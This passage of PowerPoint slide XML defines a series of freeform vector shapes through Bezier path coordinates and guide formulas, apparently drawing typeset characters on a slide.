                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="90"/>
                    <a:pt x="114" y="90"/>
                    <a:pt x="114" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="121"/>
                    <a:pt x="127" y="121"/>
                    <a:pt x="134" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="153" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="5"/>
                    <a:pt x="69" y="0"/>
                    <a:pt x="52" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="12" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="44" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="12" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="305"/>
                    <a:pt x="116" y="305"/>
                    <a:pt x="116" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="275"/>
                    <a:pt x="104" y="275"/>
                    <a:pt x="96" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="275"/>
                    <a:pt x="143" y="275"/>
                    <a:pt x="143" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="305"/>
                    <a:pt x="156" y="305"/>
                    <a:pt x="163" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="222" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="305"/>
                    <a:pt x="243" y="305"/>
                    <a:pt x="243" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="275"/>
                    <a:pt x="230" y="275"/>
                    <a:pt x="222" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132" y="17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42" name="Freeform 283">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2702741D-769D-4AFF-9B45-6A1349CF72EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId83"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3406776" y="3482976"/>
              <a:ext cx="79375" cy="134938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 80 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 80 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 167 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="24" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="80" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="167" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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43" name="Freeform 284">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33741D83-7754-4077-BA82-BD228A912B72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId84"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3513139" y="3521076"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168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4" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="114" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168"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44" name="Freeform 285">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52311A31-626E-4491-8386-33A5F14DF875}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId85"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3630614" y="3465513"/>
              <a:ext cx="55563" cy="169863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 131 w 131"/>
                <a:gd name="T1" fmla="*/ 194 h 387"/>
                <a:gd name="T2" fmla="*/ 91 w 131"/>
                <a:gd name="T3" fmla="*/ 64 h 387"/>
                <a:gd name="T4" fmla="*/ 15 w 131"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 0 w 131"/>
                <a:gd name="T7" fmla="*/ 14 h 387"/>
                <a:gd name="T8" fmla="*/ 8 w 131"/>
                <a:gd name="T9" fmla="*/ 27 h 387"/>
                <a:gd name="T10" fmla="*/ 97 w 131"/>
                <a:gd name="T11" fmla="*/ 194 h 387"/>
                <a:gd name="T12" fmla="*/ 11 w 131"/>
                <a:gd name="T13" fmla="*/ 358 h 387"/>
                <a:gd name="T14" fmla="*/ 0 w 131"/>
                <a:gd name="T15" fmla="*/ 373 h 387"/>
                <a:gd name="T16" fmla="*/ 15 w 131"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 131 w 131"/>
                <a:gd name="T19" fmla="*/ 194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387">
                  <a:moveTo>
                    <a:pt x="131" y="194"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="134"/>
                    <a:pt x="108" y="89"/>
                    <a:pt x="91" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="28"/>
                    <a:pt x="27" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="22"/>
                    <a:pt x="5" y="25"/>
                    <a:pt x="8" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="81"/>
                    <a:pt x="97" y="161"/>
                    <a:pt x="97" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="243"/>
                    <a:pt x="79" y="313"/>
                    <a:pt x="11" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="363"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="377"/>
                    <a:pt x="3" y="387"/>
                    <a:pt x="15" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="387"/>
                    <a:pt x="131" y="321"/>
                    <a:pt x="131" y="1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45" name="Freeform 286">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C37D442-AD05-4D68-8BB5-6928AD6A6DA6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId86"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3840164" y="3500438"/>
              <a:ext cx="95250" cy="100013"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 129 w 223"/>
                <a:gd name="T1" fmla="*/ 130 h 225"/>
                <a:gd name="T2" fmla="*/ 200 w 223"/>
                <a:gd name="T3" fmla="*/ 130 h 225"/>
                <a:gd name="T4" fmla="*/ 223 w 223"/>
                <a:gd name="T5" fmla="*/ 113 h 225"/>
                <a:gd name="T6" fmla="*/ 200 w 223"/>
                <a:gd name="T7" fmla="*/ 95 h 225"/>
                <a:gd name="T8" fmla="*/ 129 w 223"/>
                <a:gd name="T9" fmla="*/ 95 h 225"/>
                <a:gd name="T10" fmla="*/ 129 w 223"/>
                <a:gd name="T11" fmla="*/ 24 h 225"/>
                <a:gd name="T12" fmla="*/ 112 w 223"/>
                <a:gd name="T13" fmla="*/ 0 h 225"/>
                <a:gd name="T14" fmla="*/ 94 w 223"/>
                <a:gd name="T15" fmla="*/ 24 h 225"/>
                <a:gd name="T16" fmla="*/ 94 w 223"/>
                <a:gd name="T17" fmla="*/ 95 h 225"/>
                <a:gd name="T18" fmla="*/ 23 w 223"/>
                <a:gd name="T19" fmla="*/ 95 h 225"/>
                <a:gd name="T20" fmla="*/ 0 w 223"/>
                <a:gd name="T21" fmla="*/ 113 h 225"/>
                <a:gd name="T22" fmla="*/ 23 w 223"/>
                <a:gd name="T23" fmla="*/ 130 h 225"/>
                <a:gd name="T24" fmla="*/ 94 w 223"/>
                <a:gd name="T25" fmla="*/ 130 h 225"/>
                <a:gd name="T26" fmla="*/ 94 w 223"/>
                <a:gd name="T27" fmla="*/ 201 h 225"/>
                <a:gd name="T28" fmla="*/ 112 w 223"/>
                <a:gd name="T29" fmla="*/ 225 h 225"/>
                <a:gd name="T30" fmla="*/ 129 w 223"/>
                <a:gd name="T31" fmla="*/ 201 h 225"/>
                <a:gd name="T32" fmla="*/ 129 w 223"/>
                <a:gd name="T33" fmla="*/ 13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3" h="225">
                  <a:moveTo>
                    <a:pt x="129" y="130"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="200" y="130"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="130"/>
                    <a:pt x="223" y="130"/>
                    <a:pt x="223" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="95"/>
                    <a:pt x="206" y="95"/>
                    <a:pt x="200" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="129" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="18"/>
                    <a:pt x="129" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="0"/>
                    <a:pt x="94" y="18"/>
                    <a:pt x="94" y="24"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="95"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="95"/>
                    <a:pt x="0" y="95"/>
                    <a:pt x="0" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="130"/>
                    <a:pt x="17" y="130"/>
                    <a:pt x="23" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="201"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="207"/>
                    <a:pt x="94" y="225"/>
                    <a:pt x="112" y="225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="225"/>
                    <a:pt x="129" y="207"/>
                    <a:pt x="129" y="201"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="129" y="1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46" name="Freeform 287">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7CD9E57-F3FA-41DD-AAFC-25AFA63538F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId87"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4098926" y="3481388"/>
              <a:ext cx="19050" cy="63500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 45 w 46"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 23 w 46"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 0 w 46"/>
                <a:gd name="T5" fmla="*/ 22 h 147"/>
                <a:gd name="T6" fmla="*/ 1 w 46"/>
                <a:gd name="T7" fmla="*/ 32 h 147"/>
                <a:gd name="T8" fmla="*/ 7 w 46"/>
                <a:gd name="T9" fmla="*/ 128 h 147"/>
                <a:gd name="T10" fmla="*/ 23 w 46"/>
                <a:gd name="T11" fmla="*/ 147 h 147"/>
                <a:gd name="T12" fmla="*/ 38 w 46"/>
                <a:gd name="T13" fmla="*/ 128 h 147"/>
                <a:gd name="T14" fmla="*/ 45 w 46"/>
                <a:gd name="T15" fmla="*/ 28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147">
                  <a:moveTo>
                    <a:pt x="45" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="7"/>
                    <a:pt x="35" y="0"/>
                    <a:pt x="23" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="128"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="8" y="147"/>
                    <a:pt x="23" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="38" y="136"/>
                    <a:pt x="38" y="128"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45"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47" name="Freeform 288">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A215240-BA66-4E55-88E4-083ED8933542}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId88"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4395789" y="3495676"/>
              <a:ext cx="87313" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 206"/>
                <a:gd name="T1" fmla="*/ 141 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 125 h 249"/>
                <a:gd name="T4" fmla="*/ 197 w 206"/>
                <a:gd name="T5" fmla="*/ 109 h 249"/>
                <a:gd name="T6" fmla="*/ 31 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 18 w 206"/>
                <a:gd name="T9" fmla="*/ 0 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 17 h 249"/>
                <a:gd name="T12" fmla="*/ 12 w 206"/>
                <a:gd name="T13" fmla="*/ 34 h 249"/>
                <a:gd name="T14" fmla="*/ 156 w 206"/>
                <a:gd name="T15" fmla="*/ 125 h 249"/>
                <a:gd name="T16" fmla="*/ 12 w 206"/>
                <a:gd name="T17" fmla="*/ 215 h 249"/>
                <a:gd name="T18" fmla="*/ 0 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 18 w 206"/>
                <a:gd name="T21" fmla="*/ 249 h 249"/>
                <a:gd name="T22" fmla="*/ 31 w 206"/>
                <a:gd name="T23" fmla="*/ 244 h 249"/>
                <a:gd name="T24" fmla="*/ 195 w 206"/>
                <a:gd name="T25" fmla="*/ 14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49">
                  <a:moveTo>
                    <a:pt x="195" y="141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="138"/>
                    <a:pt x="206" y="134"/>
                    <a:pt x="206" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="118"/>
                    <a:pt x="202" y="113"/>
                    <a:pt x="197" y="109"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="31" y="5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="22" y="0"/>
                    <a:pt x="18" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="7" y="31"/>
                    <a:pt x="12" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="218"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="243"/>
                    <a:pt x="10" y="249"/>
                    <a:pt x="18" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="249"/>
                    <a:pt x="24" y="249"/>
                    <a:pt x="31" y="244"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="14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48" name="Freeform 289">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F47E484-B275-44FA-8CEC-D5C5DD7A62E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId89"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4540251" y="3481388"/>
              <a:ext cx="19050" cy="63500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 45 w 46"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 23 w 46"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 0 w 46"/>
                <a:gd name="T5" fmla="*/ 22 h 147"/>
                <a:gd name="T6" fmla="*/ 1 w 46"/>
                <a:gd name="T7" fmla="*/ 32 h 147"/>
                <a:gd name="T8" fmla="*/ 7 w 46"/>
                <a:gd name="T9" fmla="*/ 128 h 147"/>
                <a:gd name="T10" fmla="*/ 23 w 46"/>
                <a:gd name="T11" fmla="*/ 147 h 147"/>
                <a:gd name="T12" fmla="*/ 38 w 46"/>
                <a:gd name="T13" fmla="*/ 128 h 147"/>
                <a:gd name="T14" fmla="*/ 45 w 46"/>
                <a:gd name="T15" fmla="*/ 28 h 1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147">
                  <a:moveTo>
                    <a:pt x="45" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="7"/>
                    <a:pt x="35" y="0"/>
                    <a:pt x="23" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="128"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="8" y="147"/>
                    <a:pt x="23" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
